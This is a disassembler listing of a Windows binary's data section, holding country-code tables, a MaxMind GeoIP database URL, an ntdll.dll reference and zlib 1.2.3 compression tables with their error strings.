dword_9A3CF4 dd 4544h dword_9A3CF8 dd 5441h dword_9A3CFC dd 4754h dword_9A3D00 dd 4454h dword_9A3D04 dd 5453h dword_9A3D08 dd 4E53h dword_9A3D0C dd 454Eh dword_9A3D10 dd 434Eh dword_9A3D14 dd 534Dh dword_9A3D18 dd 514Dh dword_9A3D1C dd 474Dh dword_9A3D20 dd 5448h dword_9A3D24 dd 5047h dword_9A3D28 dd 4E47h dword_9A3D2C dd 4147h dword_9A3D30 dd 4A44h dword_9A3D34 dd 4D43h dword_9A3D38 dd 4443h dword_9A3D3C dd 4A42h dword_9A3D40 dd 4942h dword_9A3D44 dd 4642h dword_9A3D48 dd 4943h dword_9A3D4C dd 5459h ; .text:009A3AF0�o
dword_9A3D50 dd 4657h ; .text:009A3AEC�o
dword_9A3D54 dd 4552h dword_9A3D58 dd 4D50h ; .text:009A3AD8�o
dword_9A3D5C dd 4654h dword_9A3D60 dd 4650h dword_9A3D64 dd 4647h dword_9A3D68 dd 5246h dword_9A3D6C dd 4946h dword_9A3D70 dd 4D53h ; .text:009A3B28�o
dword_9A3D74 dd 4C4Eh dword_9A3D78 dd 4542h dword_9A3D7C dd 5741h dword_9A3D80 dd 4E41h ; .text:009A3B68�o
dword_9A3D84 dd 4B44h dword_9A3D88 dd 5A43h dword_9A3D8C dd 5754h dword_9A3D90 dd 4753h dword_9A3D94 dd 4F4Dh dword_9A3D98 dd 4B48h dword_9A3D9C dd 4E43h dword_9A3DA0 dd 5242h dword_9A3DA4 dd 4559h dword_9A3DA8 dd 4E54h dword_9A3DAC dd 5953h dword_9A3DB0 dd 4453h dword_9A3DB4 dd 4153h dword_9A3DB8 dd 4151h dword_9A3DBC dd 4D4Fh dword_9A3DC0 dd 524Dh dword_9A3DC4 dd 414Dh dword_9A3DC8 dd 594Ch dword_9A3DCC dd 424Ch dword_9A3DD0 dd 574Bh dword_9A3DD4 dd 5249h dword_9A3DD8 dd 5149h dword_9A3DDC dd 4745h dword_9A3DE0 dd 5A44h dword_9A3DE4 dd 4842h dword_9A3DE8 dd 4541h, 0 dword_9A3DF0 dd 0FFFFFFFFh, 9AC520h, 9AC524hdword_9A3DFC dd 6272h ; sub_9ACCC3+4F�o
dword_9A3E00 dd 6277h aVarfileinfoTra db '\VarFileInfo\Translation',0 ; DATA XREF: sub_9AC5AF+95�o
align 10h
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_9AC5AF+3D�o
align 10h
stru_9A3E30 _msEH <0FFFFFFFFh, offset loc_9AC67E, offset loc_9AC682>
; DATA XREF: sub_9AC5AF+5�o
aHttpWww_maxmin db 'http://www.maxmind.com/download/geoip/database/GeoIP.dat.gz',0
; DATA XREF: sub_9AC693+3C�o
stru_9A3E78 _msEH <0FFFFFFFFh, offset loc_9AC732, offset loc_9AC736>
; DATA XREF: sub_9AC693+2�o
align 8
stru_9A3E88 _msEH <0FFFFFFFFh, offset loc_9AC82E, offset loc_9AC832>
; DATA XREF: sub_9AC747+2�o
dword_9A3E94 dd 255C7325h, 73hdword_9A3E9C dd 2Eh ; sub_9AC843+FF�o
stru_9A3EA0 _msEH <0FFFFFFFFh, offset loc_9ACA1D, offset loc_9ACA21>
; DATA XREF: sub_9AC843+5�o
align 10h
dword_9A3EB0 dd 41002D2Dh dd 55450050h, 444100h, 41004541h, 47410046h, 494100h, 41004C41h
dd 4E41004Dh, 4F4100h, 41005141h, 53410052h, 544100h, 41005541h
dd 5A410057h, 414200h, 42004242h, 45420044h, 464200h, 42004742h
dd 49420048h, 4A4200h, 42004D42h, 4F42004Eh, 524200h, 42005342h
dd 56420054h, 574200h, 42005942h, 4143005Ah, 434300h, 43004443h
dd 47430046h, 484300h, 43004943h, 4C43004Bh, 4D4300h, 43004E43h
dd 5243004Fh, 554300h, 43005643h, 59430058h, 5A4300h, 44004544h
dd 4B44004Ah, 4D4400h, 44004F44h, 4345005Ah, 454500h, 45004745h
dd 52450048h, 534500h, 46005445h, 4A460049h, 4B4600h, 46004D46h
dd 5246004Fh, 584600h, 47004147h, 44470042h, 454700h, 47004647h
dd 49470048h, 4C4700h, 47004D47h, 5047004Eh, 514700h, 47005247h
dd 54470053h, 554700h, 47005747h, 4B480059h, 4D4800h, 48004E48h
dd 54480052h, 554800h, 49004449h, 4C490045h, 4E4900h, 49004F49h
dd 52490051h, 534900h, 4A005449h, 4F4A004Dh, 504A00h, 4B00454Bh
dd 484B0047h, 494B00h, 4B004D4Bh, 504B004Eh, 524B00h, 4B00574Bh
dd 5A4B0059h, 414C00h, 4C00424Ch, 494C0043h, 4B4C00h, 4C00524Ch
dd 544C0053h, 554C00h, 4C00564Ch, 414D0059h, 434D00h, 4D00444Dh
dd 484D0047h, 4B4D00h, 4D004C4Dh, 4E4D004Dh, 4F4D00h, 4D00504Dh
dd 524D0051h, 534D00h, 4D00544Dh, 564D0055h, 574D00h, 4D00584Dh
dd 5A4D0059h, 414E00h, 4E00434Eh, 464E0045h, 474E00h, 4E00494Eh
dd 4F4E004Ch, 504E00h, 4E00524Eh, 5A4E0055h, 4D4F00h, 50004150h
dd 46500045h, 475000h, 50004850h, 4C50004Bh, 4D5000h, 50004E50h
dd 53500052h, 545000h, 50005750h, 41510059h, 455200h, 52004F52h
dd 57520055h, 415300h, 53004253h, 44530043h, 455300h, 53004753h
dd 49530048h, 4A5300h, 53004B53h, 4D53004Ch, 4E5300h, 53004F53h
dd 54530052h, 565300h, 53005953h, 4354005Ah, 445400h, 54004654h
dd 48540047h, 4A5400h, 54004B54h, 4E54004Dh, 4F5400h, 54004C54h
dd 54540052h, 565400h, 54005754h, 4155005Ah, 475500h, 55004D55h
dd 59550053h, 5A5500h, 56004156h, 45560043h, 475600h, 56004956h
dd 5556004Eh, 465700h, 59005357h, 54590045h, 535200h, 5A00415Ah
dd 454D004Dh, 575A00h, 41003141h, 314F0032h, 584100h, 49004747h
dd 454A004Dh, 4C4200h, 464Dh, 0FDh
dword_9A41AC dd 2E322E31h, 33hbyte_9A41B4 db 0 ; DATA XREF: sub_9AD116+1F�r
db 1, 2, 4
dd 0A080705h, 16100C0Bh, 1A17h, 0
aDeflate1_2_3Co db ' deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly ',0
align 10h
dd 2 dup(0)
dd offset sub_9AD804
dd 40004h, 40008h, 9AD92Ch, 50004h, 80010h, 9AD92Ch, 60004h
dd 200020h, 9AD92Ch, 40004h, 100010h, 9ADC14h, 100008h
dd 200020h, 9ADC14h, 100008h, 800080h, 9ADC14h, 200008h
dd 1000080h, 9ADC14h, 800020h, 4000102h, 9ADC14h, 1020020h
dd 10000102h, 9ADC14h, 2E322E31h, 33h
dword_9A4280 dd 760h, 500800h, 100800h, 730814h, 1F0712h, 700800h, 300800h
; DATA XREF: sub_9AE1BD:loc_9AE8A0�o
dd 0C00900h, 0A0710h, 600800h, 200800h, 0A00900h, 800h
dd 800800h, 400800h, 0E00900h, 60710h, 580800h, 180800h
dd 900900h, 3B0713h, 780800h, 380800h, 0D00900h, 110711h
dd 680800h, 280800h, 0B00900h, 80800h, 880800h, 480800h
dd 0F00900h, 40710h, 540800h, 140800h, 0E30815h, 2B0713h
dd 740800h, 340800h, 0C80900h, 0D0711h, 640800h, 240800h
dd 0A80900h, 40800h, 840800h, 440800h, 0E80900h, 80710h
dd 5C0800h, 1C0800h, 980900h, 530714h, 7C0800h, 3C0800h
dd 0D80900h, 170712h, 6C0800h, 2C0800h, 0B80900h, 0C0800h
dd 8C0800h, 4C0800h, 0F80900h, 30710h, 520800h, 120800h
dd 0A30815h, 230713h, 720800h, 320800h, 0C40900h, 0B0711h
dd 620800h, 220800h, 0A40900h, 20800h, 820800h, 420800h
dd 0E40900h, 70710h, 5A0800h, 1A0800h, 940900h, 430714h
dd 7A0800h, 3A0800h, 0D40900h, 130712h, 6A0800h, 2A0800h
dd 0B40900h, 0A0800h, 8A0800h, 4A0800h, 0F40900h, 50710h
dd 560800h, 160800h, 840h, 330713h, 760800h, 360800h, 0CC0900h
dd 0F0711h, 660800h, 260800h, 0AC0900h, 60800h, 860800h
dd 460800h, 0EC0900h, 90710h, 5E0800h, 1E0800h, 9C0900h
dd 630714h, 7E0800h, 3E0800h, 0DC0900h, 1B0712h, 6E0800h
dd 2E0800h, 0BC0900h, 0E0800h, 8E0800h, 4E0800h, 0FC0900h
dd 760h, 510800h, 110800h, 830815h, 1F0712h, 710800h, 310800h
dd 0C20900h, 0A0710h, 610800h, 210800h, 0A20900h, 10800h
dd 810800h, 410800h, 0E20900h, 60710h, 590800h, 190800h
dd 920900h, 3B0713h, 790800h, 390800h, 0D20900h, 110711h
dd 690800h, 290800h, 0B20900h, 90800h, 890800h, 490800h
dd 0F20900h, 40710h, 550800h, 150800h, 1020810h, 2B0713h
dd 750800h, 350800h, 0CA0900h, 0D0711h, 650800h, 250800h
dd 0AA0900h, 50800h, 850800h, 450800h, 0EA0900h, 80710h
dd 5D0800h, 1D0800h, 9A0900h, 530714h, 7D0800h, 3D0800h
dd 0DA0900h, 170712h, 6D0800h, 2D0800h, 0BA0900h, 0D0800h
dd 8D0800h, 4D0800h, 0FA0900h, 30710h, 530800h, 130800h
dd 0C30815h, 230713h, 730800h, 330800h, 0C60900h, 0B0711h
dd 630800h, 230800h, 0A60900h, 30800h, 830800h, 430800h
dd 0E60900h, 70710h, 5B0800h, 1B0800h, 960900h, 430714h
dd 7B0800h, 3B0800h, 0D60900h, 130712h, 6B0800h, 2B0800h
dd 0B60900h, 0B0800h, 8B0800h, 4B0800h, 0F60900h, 50710h
dd 570800h, 170800h, 840h, 330713h, 770800h, 370800h, 0CE0900h
dd 0F0711h, 670800h, 270800h, 0AE0900h, 70800h, 870800h
dd 470800h, 0EE0900h, 90710h, 5F0800h, 1F0800h, 9E0900h
dd 630714h, 7F0800h, 3F0800h, 0DE0900h, 1B0712h, 6F0800h
dd 2F0800h, 0BE0900h, 0F0800h, 8F0800h, 4F0800h, 0FE0900h
dd 760h, 500800h, 100800h, 730814h, 1F0712h, 700800h, 300800h
dd 0C10900h, 0A0710h, 600800h, 200800h, 0A10900h, 800h
dd 800800h, 400800h, 0E10900h, 60710h, 580800h, 180800h
dd 910900h, 3B0713h, 780800h, 380800h, 0D10900h, 110711h
dd 680800h, 280800h, 0B10900h, 80800h, 880800h, 480800h
dd 0F10900h, 40710h, 540800h, 140800h, 0E30815h, 2B0713h
dd 740800h, 340800h, 0C90900h, 0D0711h, 640800h, 240800h
dd 0A90900h, 40800h, 840800h, 440800h, 0E90900h, 80710h
dd 5C0800h, 1C0800h, 990900h, 530714h, 7C0800h, 3C0800h
dd 0D90900h, 170712h, 6C0800h, 2C0800h, 0B90900h, 0C0800h
dd 8C0800h, 4C0800h, 0F90900h, 30710h, 520800h, 120800h
dd 0A30815h, 230713h, 720800h, 320800h, 0C50900h, 0B0711h
dd 620800h, 220800h, 0A50900h, 20800h, 820800h, 420800h
dd 0E50900h, 70710h, 5A0800h, 1A0800h, 950900h, 430714h
dd 7A0800h, 3A0800h, 0D50900h, 130712h, 6A0800h, 2A0800h
dd 0B50900h, 0A0800h, 8A0800h, 4A0800h, 0F50900h, 50710h
dd 560800h, 160800h, 840h, 330713h, 760800h, 360800h, 0CD0900h
dd 0F0711h, 660800h, 260800h, 0AD0900h, 60800h, 860800h
dd 460800h, 0ED0900h, 90710h, 5E0800h, 1E0800h, 9D0900h
dd 630714h, 7E0800h, 3E0800h, 0DD0900h, 1B0712h, 6E0800h
dd 2E0800h, 0BD0900h, 0E0800h, 8E0800h, 4E0800h, 0FD0900h
dd 760h, 510800h, 110800h, 830815h, 1F0712h, 710800h, 310800h
dd 0C30900h, 0A0710h, 610800h, 210800h, 0A30900h, 10800h
dd 810800h, 410800h, 0E30900h, 60710h, 590800h, 190800h
dd 930900h, 3B0713h, 790800h, 390800h, 0D30900h, 110711h
dd 690800h, 290800h, 0B30900h, 90800h, 890800h, 490800h
dd 0F30900h, 40710h, 550800h, 150800h, 1020810h, 2B0713h
dd 750800h, 350800h, 0CB0900h, 0D0711h, 650800h, 250800h
dd 0AB0900h, 50800h, 850800h, 450800h, 0EB0900h, 80710h
dd 5D0800h, 1D0800h, 9B0900h, 530714h, 7D0800h, 3D0800h
dd 0DB0900h, 170712h, 6D0800h, 2D0800h, 0BB0900h, 0D0800h
dd 8D0800h, 4D0800h, 0FB0900h, 30710h, 530800h, 130800h
dd 0C30815h, 230713h, 730800h, 330800h, 0C70900h, 0B0711h
dd 630800h, 230800h, 0A70900h, 30800h, 830800h, 430800h
dd 0E70900h, 70710h, 5B0800h, 1B0800h, 970900h, 430714h
dd 7B0800h, 3B0800h, 0D70900h, 130712h, 6B0800h, 2B0800h
dd 0B70900h, 0B0800h, 8B0800h, 4B0800h, 0F70900h, 50710h
dd 570800h, 170800h, 840h, 330713h, 770800h, 370800h, 0CF0900h
dd 0F0711h, 670800h, 270800h, 0AF0900h, 70800h, 870800h
dd 470800h, 0EF0900h, 90710h, 5F0800h, 1F0800h, 9F0900h
dd 630714h, 7F0800h, 3F0800h, 0DF0900h, 1B0712h, 6F0800h
dd 2F0800h, 0BF0900h, 0F0800h, 8F0800h, 4F0800h, 0FF0900h
dword_9A4A80 dd 10510h, 1010517h, 110513h, 1001051Bh, 50511h, 4010519h
; DATA XREF: sub_9AE1BD+6F1�o
dd 410515h, 4001051Dh, 30510h, 2010518h, 210514h, 2001051Ch
dd 90512h, 801051Ah, 810516h, 540h, 20510h, 1810517h, 190513h
dd 1801051Bh, 70511h, 6010519h, 610515h, 6001051Dh, 40510h
dd 3010518h, 310514h, 3001051Ch, 0D0512h, 0C01051Ah, 0C10516h
dd 540h
word_9A4B00 dw 10h ; DATA XREF: sub_9AE1BD+878�r
; sub_9AE1BD+8A5�r
dw 11h
dd 12h, 70008h, 60009h, 5000Ah, 4000Bh, 3000Ch, 2000Dh
dd 1000Eh, 0Fh
aIncorrectLengt db 'incorrect length check',0 ; DATA XREF: sub_9AE1BD+1033�o
align 10h
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_9AE1BD+FE0�o
align 4
aInvalidDista_1 db 'invalid distance too far back',0 ; DATA XREF: sub_9AE1BD+E7F�o
; sub_9AFA38:loc_9AFD69�o
align 4
aInvalidDista_0 db 'invalid distance code',0 ; DATA XREF: sub_9AE1BD+E0C�o
; sub_9AFA38:loc_9AFD72�o
align 10h
aInvalidLiter_0 db 'invalid literal/length code',0 ; DATA XREF: sub_9AE1BD+CD0�o
; sub_9AFA38:loc_9AFD88�o
aInvalidDistanc db 'invalid distances set',0 ; DATA XREF: sub_9AE1BD+B58�o
align 4
aInvalidLiteral db 'invalid literal/lengths set',0 ; DATA XREF: sub_9AE1BD+B13�o
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_9AE1BD+AB3�o
; sub_9AE1BD+AC2�o
align 4
aInvalidCodeLen db 'invalid code lengths set',0 ; DATA XREF: sub_9AE1BD+8F6�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_9AE1BD+845�o
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_9AE1BD+761�o
align 4
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_9AE1BD+6CC�o
align 10h
aHeaderCrcMisma db 'header crc mismatch',0 ; DATA XREF: sub_9AE1BD+58F�o
aUnknownHeaderF db 'unknown header flags set',0 ; DATA XREF: sub_9AE1BD+1E5�o
align 10h
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_9AE1BD+1D1�o
align 4
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_9AE1BD+193�o
align 4
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_9AE1BD+14F�o
dd 1Fh, 8Bh
aCCCCCCCCCC db '%c%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_9AF64C+173�o
align 4
db '`',7,0
align 4
dd 500800h, 100800h, 730814h, 1F0712h, 700800h, 300800h
dd 0C00900h, 0A0710h, 600800h, 200800h, 0A00900h, 800h
dd 800800h, 400800h, 0E00900h, 60710h, 580800h, 180800h
dd 900900h, 3B0713h, 780800h, 380800h, 0D00900h, 110711h
dd 680800h, 280800h, 0B00900h, 80800h, 880800h, 480800h
dd 0F00900h, 40710h, 540800h, 140800h, 0E30815h, 2B0713h
dd 740800h, 340800h, 0C80900h, 0D0711h, 640800h, 240800h
dd 0A80900h, 40800h, 840800h, 440800h, 0E80900h, 80710h
dd 5C0800h, 1C0800h, 980900h, 530714h, 7C0800h, 3C0800h
dd 0D80900h, 170712h, 6C0800h, 2C0800h, 0B80900h, 0C0800h
dd 8C0800h, 4C0800h, 0F80900h, 30710h, 520800h, 120800h
dd 0A30815h, 230713h, 720800h, 320800h, 0C40900h, 0B0711h
dd 620800h, 220800h, 0A40900h, 20800h, 820800h, 420800h
dd 0E40900h, 70710h, 5A0800h, 1A0800h, 940900h, 430714h
dd 7A0800h, 3A0800h, 0D40900h, 130712h, 6A0800h, 2A0800h
dd 0B40900h, 0A0800h, 8A0800h, 4A0800h, 0F40900h, 50710h
dd 560800h, 160800h, 840h, 330713h, 760800h, 360800h, 0CC0900h
dd 0F0711h, 660800h, 260800h, 0AC0900h, 60800h, 860800h
dd 460800h, 0EC0900h, 90710h, 5E0800h, 1E0800h, 9C0900h
dd 630714h, 7E0800h, 3E0800h, 0DC0900h, 1B0712h, 6E0800h
dd 2E0800h, 0BC0900h, 0E0800h, 8E0800h, 4E0800h, 0FC0900h
dd 760h, 510800h, 110800h, 830815h, 1F0712h, 710800h, 310800h
dd 0C20900h, 0A0710h, 610800h, 210800h, 0A20900h, 10800h
dd 810800h, 410800h, 0E20900h, 60710h, 590800h, 190800h
dd 920900h, 3B0713h, 790800h, 390800h, 0D20900h, 110711h
dd 690800h, 290800h, 0B20900h, 90800h, 890800h, 490800h
dd 0F20900h, 40710h, 550800h, 150800h, 1020810h, 2B0713h
dd 750800h, 350800h, 0CA0900h, 0D0711h, 650800h, 250800h
dd 0AA0900h, 50800h, 850800h, 450800h, 0EA0900h, 80710h
dd 5D0800h, 1D0800h, 9A0900h, 530714h, 7D0800h, 3D0800h
dd 0DA0900h, 170712h, 6D0800h, 2D0800h, 0BA0900h, 0D0800h
dd 8D0800h, 4D0800h, 0FA0900h, 30710h, 530800h, 130800h
dd 0C30815h, 230713h, 730800h, 330800h, 0C60900h, 0B0711h
dd 630800h, 230800h, 0A60900h, 30800h, 830800h, 430800h
dd 0E60900h, 70710h, 5B0800h, 1B0800h, 960900h, 430714h
dd 7B0800h, 3B0800h, 0D60900h, 130712h, 6B0800h, 2B0800h
dd 0B60900h, 0B0800h, 8B0800h, 4B0800h, 0F60900h, 50710h
dd 570800h, 170800h, 840h, 330713h, 770800h, 370800h, 0CE0900h
dd 0F0711h, 670800h, 270800h, 0AE0900h, 70800h, 870800h
dd 470800h, 0EE0900h, 90710h, 5F0800h, 1F0800h, 9E0900h
dd 630714h, 7F0800h, 3F0800h, 0DE0900h, 1B0712h, 6F0800h
dd 2F0800h, 0BE0900h, 0F0800h, 8F0800h, 4F0800h, 0FE0900h
dd 760h, 500800h, 100800h, 730814h, 1F0712h, 700800h, 300800h
dd 0C10900h, 0A0710h, 600800h, 200800h, 0A10900h, 800h
dd 800800h, 400800h, 0E10900h, 60710h, 580800h, 180800h
dd 910900h, 3B0713h, 780800h, 380800h, 0D10900h, 110711h
dd 680800h, 280800h, 0B10900h, 80800h, 880800h, 480800h
dd 0F10900h, 40710h, 540800h, 140800h, 0E30815h, 2B0713h
dd 740800h, 340800h, 0C90900h, 0D0711h, 640800h, 240800h
dd 0A90900h, 40800h, 840800h, 440800h, 0E90900h, 80710h
dd 5C0800h, 1C0800h, 990900h, 530714h, 7C0800h, 3C0800h
dd 0D90900h, 170712h, 6C0800h, 2C0800h, 0B90900h, 0C0800h
dd 8C0800h, 4C0800h, 0F90900h, 30710h, 520800h, 120800h
dd 0A30815h, 230713h, 720800h, 320800h, 0C50900h, 0B0711h
dd 620800h, 220800h, 0A50900h, 20800h, 820800h, 420800h
dd 0E50900h, 70710h, 5A0800h, 1A0800h, 950900h, 430714h
dd 7A0800h, 3A0800h, 0D50900h, 130712h, 6A0800h, 2A0800h
dd 0B50900h, 0A0800h, 8A0800h, 4A0800h, 0F50900h, 50710h
dd 560800h, 160800h, 840h, 330713h, 760800h, 360800h, 0CD0900h
dd 0F0711h, 660800h, 260800h, 0AD0900h, 60800h, 860800h
dd 460800h, 0ED0900h, 90710h, 5E0800h, 1E0800h, 9D0900h
dd 630714h, 7E0800h, 3E0800h, 0DD0900h, 1B0712h, 6E0800h
dd 2E0800h, 0BD0900h, 0E0800h, 8E0800h, 4E0800h, 0FD0900h
dd 760h, 510800h, 110800h, 830815h, 1F0712h, 710800h, 310800h
dd 0C30900h, 0A0710h, 610800h, 210800h, 0A30900h, 10800h
dd 810800h, 410800h, 0E30900h, 60710h, 590800h, 190800h
dd 930900h, 3B0713h, 790800h, 390800h, 0D30900h, 110711h
dd 690800h, 290800h, 0B30900h, 90800h, 890800h, 490800h
dd 0F30900h, 40710h, 550800h, 150800h, 1020810h, 2B0713h
dd 750800h, 350800h, 0CB0900h, 0D0711h, 650800h, 250800h
dd 0AB0900h, 50800h, 850800h, 450800h, 0EB0900h, 80710h
dd 5D0800h, 1D0800h, 9B0900h, 530714h, 7D0800h, 3D0800h
dd 0DB0900h, 170712h, 6D0800h, 2D0800h, 0BB0900h, 0D0800h
dd 8D0800h, 4D0800h, 0FB0900h, 30710h, 530800h, 130800h
dd 0C30815h, 230713h, 730800h, 330800h, 0C70900h, 0B0711h
dd 630800h, 230800h, 0A70900h, 30800h, 830800h, 430800h
dd 0E70900h, 70710h, 5B0800h, 1B0800h, 970900h, 430714h
dd 7B0800h, 3B0800h, 0D70900h, 130712h, 6B0800h, 2B0800h
dd 0B70900h, 0B0800h, 8B0800h, 4B0800h, 0F70900h, 50710h
dd 570800h, 170800h, 840h, 330713h, 770800h, 370800h, 0CF0900h
dd 0F0711h, 670800h, 270800h, 0AF0900h, 70800h, 870800h
dd 470800h, 0EF0900h, 90710h, 5F0800h, 1F0800h, 9F0900h
dd 630714h, 7F0800h, 3F0800h, 0DF0900h, 1B0712h, 6F0800h
dd 2F0800h, 0BF0900h, 0F0800h, 8F0800h, 4F0800h, 0FF0900h
dd 10510h
dd 1010517h, 110513h, 1001051Bh, 50511h, 4010519h, 410515h
dd 4001051Dh, 30510h, 2010518h, 210514h, 2001051Ch, 90512h
dd 801051Ah, 810516h, 540h, 20510h, 1810517h, 190513h
dd 1801051Bh, 70511h, 6010519h, 610515h, 6001051Dh, 40510h
dd 3010518h, 310514h, 3001051Ch, 0D0512h, 0C01051Ah, 0C10516h
dd 540h, 110010h, 12h, 70008h, 60009h, 5000Ah, 4000Bh
dd 3000Ch, 2000Dh, 1000Eh, 0Fh
aInflate1_2_3Co db ' inflate 1.2.3 Copyright 1995-2005 Mark Adler ',0
align 10h
dword_9A55E0 dd 40003h, 60005h, 80007h, 0A0009h, 0D000Bh, 11000Fh, 170013h
; DATA XREF: sub_9AFDE7+141�o
dd 1F001Bh, 2B0023h, 3B0033h, 530043h, 730063h, 0A30083h
dd 0E300C3h, 102h, 0
dword_9A5620 dd 4 dup(100010h), 2 dup(110011h), 2 dup(120012h), 2 dup(130013h)
; DATA XREF: sub_9AFDE7+14B�o
dd 2 dup(140014h), 2 dup(150015h), 0C90010h, 0C4h
dword_9A5660 dd 20001h, 40003h, 70005h, 0D0009h, 190011h, 310021h, 610041h
; DATA XREF: sub_9AFDE7+12C�o
dd 0C10081h, 1810101h, 3010201h, 6010401h, 0C010801h, 18011001h
dd 30012001h, 60014001h, 0
dword_9A56A0 dd 2 dup(100010h), 110011h, 120012h, 130013h, 140014h
; DATA XREF: sub_9AFDE7+133�o
dd 150015h, 160016h, 170017h, 180018h, 190019h, 1A001Ah
dd 1B001Bh, 1C001Ch, 1D001Dh, 400040h
dword_9A56E0 dd 0 ; .text:009B54A4�o
dd 7 dup(0)
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 2 dup(0)
dword_9A5758 dd 0 dd 3 dup(0)
dword_9A5768 dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh), 10h dup(0)
dd 2, 3, 7
byte_9A581C db 10h ; DATA XREF: sub_9B09B8+190�r
; sub_9B1307:loc_9B1340�r
db 11h, 12h, 0
dd 6090708h, 40B050Ah, 20D030Ch, 0F010Eh
dword_9A5830 dd 8000Ch, 8008Ch, 8004Ch, 800CCh, 8002Ch, 800ACh, 8006Ch
; DATA XREF: sub_9B13EF+1C1�o
; .text:009B54A0�o
dd 800ECh, 8001Ch, 8009Ch, 8005Ch, 800DCh, 8003Ch, 800BCh
dd 8007Ch, 800FCh, 80002h, 80082h, 80042h, 800C2h, 80022h
dd 800A2h, 80062h, 800E2h, 80012h, 80092h, 80052h, 800D2h
dd 80032h, 800B2h, 80072h, 800F2h, 8000Ah, 8008Ah, 8004Ah
dd 800CAh, 8002Ah, 800AAh, 8006Ah, 800EAh, 8001Ah, 8009Ah
dd 8005Ah, 800DAh, 8003Ah, 800BAh, 8007Ah, 800FAh, 80006h
dd 80086h, 80046h, 800C6h, 80026h, 800A6h, 80066h, 800E6h
dd 80016h, 80096h, 80056h, 800D6h, 80036h, 800B6h, 80076h
dd 800F6h, 8000Eh, 8008Eh, 8004Eh, 800CEh, 8002Eh, 800AEh
dd 8006Eh, 800EEh, 8001Eh, 8009Eh, 8005Eh, 800DEh, 8003Eh
dd 800BEh, 8007Eh, 800FEh, 80001h, 80081h, 80041h, 800C1h
dd 80021h, 800A1h, 80061h, 800E1h, 80011h, 80091h, 80051h
dd 800D1h, 80031h, 800B1h, 80071h, 800F1h, 80009h, 80089h
dd 80049h, 800C9h, 80029h, 800A9h, 80069h, 800E9h, 80019h
dd 80099h, 80059h, 800D9h, 80039h, 800B9h, 80079h, 800F9h
dd 80005h, 80085h, 80045h, 800C5h, 80025h, 800A5h, 80065h
dd 800E5h, 80015h, 80095h, 80055h, 800D5h, 80035h, 800B5h
dd 80075h, 800F5h, 8000Dh, 8008Dh, 8004Dh, 800CDh, 8002Dh
dd 800ADh, 8006Dh, 800EDh, 8001Dh, 8009Dh, 8005Dh, 800DDh
dd 8003Dh, 800BDh, 8007Dh, 800FDh, 90013h, 90113h, 90093h
dd 90193h, 90053h, 90153h, 900D3h, 901D3h, 90033h, 90133h
dd 900B3h, 901B3h, 90073h, 90173h, 900F3h, 901F3h, 9000Bh
dd 9010Bh, 9008Bh, 9018Bh, 9004Bh, 9014Bh, 900CBh, 901CBh
dd 9002Bh, 9012Bh, 900ABh, 901ABh, 9006Bh, 9016Bh, 900EBh
dd 901EBh, 9001Bh, 9011Bh, 9009Bh, 9019Bh, 9005Bh, 9015Bh
dd 900DBh, 901DBh, 9003Bh, 9013Bh, 900BBh, 901BBh, 9007Bh
dd 9017Bh, 900FBh, 901FBh, 90007h, 90107h, 90087h, 90187h
dd 90047h, 90147h, 900C7h, 901C7h, 90027h, 90127h, 900A7h
dd 901A7h, 90067h, 90167h, 900E7h, 901E7h, 90017h, 90117h
dd 90097h, 90197h, 90057h, 90157h, 900D7h, 901D7h, 90037h
dd 90137h, 900B7h, 901B7h, 90077h, 90177h, 900F7h, 901F7h
dd 9000Fh, 9010Fh, 9008Fh, 9018Fh, 9004Fh, 9014Fh, 900CFh
dd 901CFh, 9002Fh, 9012Fh, 900AFh, 901AFh, 9006Fh, 9016Fh
dd 900EFh, 901EFh, 9001Fh, 9011Fh, 9009Fh, 9019Fh, 9005Fh
dd 9015Fh, 900DFh, 901DFh, 9003Fh, 9013Fh, 900BFh, 901BFh
dd 9007Fh, 9017Fh, 900FFh, 901FFh, 70000h, 70040h, 70020h
dd 70060h, 70010h, 70050h, 70030h, 70070h, 70008h, 70048h
dd 70028h, 70068h, 70018h, 70058h, 70038h, 70078h, 70004h
dd 70044h, 70024h, 70064h, 70014h, 70054h, 70034h, 70074h
dd 80003h, 80083h, 80043h, 800C3h, 80023h, 800A3h, 80063h
dd 800E3h
dword_9A5CB0 dd 50000h, 50010h, 50008h, 50018h, 50004h, 50014h, 5000Ch
; DATA XREF: sub_9B13EF:loc_9B15AB�o
dd 5001Ch, 50002h, 50012h, 5000Ah, 5001Ah, 50006h, 50016h
dd 5000Eh, 5001Eh, 50001h, 50011h, 50009h, 50019h, 50005h
dd 50015h, 5000Dh, 5001Dh, 50003h, 50013h, 5000Bh, 5001Bh
dd 50007h, 50017h
byte_9A5D28 db 0 ; DATA XREF: .text:009ADA53�r
; .text:009ADDA1�r ...
db 1, 2, 3
dd 5050404h, 6060606h, 7070707h, 2 dup(8080808h), 2 dup(9090909h)
dd 4 dup(0A0A0A0Ah), 4 dup(0B0B0B0Bh), 8 dup(0C0C0C0Ch)
dd 8 dup(0D0D0D0Dh), 10h dup(0E0E0E0Eh), 10h dup(0F0F0F0Fh)
byte_9A5E28 db 0 ; DATA XREF: .text:009ADA5F�r
; .text:009ADDAD�r ...
align 2
dw 1110h
dd 13131212h, 14141414h, 15151515h, 2 dup(16161616h), 2 dup(17171717h)
dd 4 dup(18181818h), 4 dup(19191919h), 8 dup(1A1A1A1Ah)
dd 8 dup(1B1B1B1Bh), 10h dup(1C1C1C1Ch), 10h dup(1D1D1D1Dh)
dword_9A5F28 dd 3020100h, 7060504h, 9090808h, 0B0B0A0Ah, 0C0C0C0Ch
; DATA XREF: .text:009ADA34�r
; .text:009ADD82�r ...
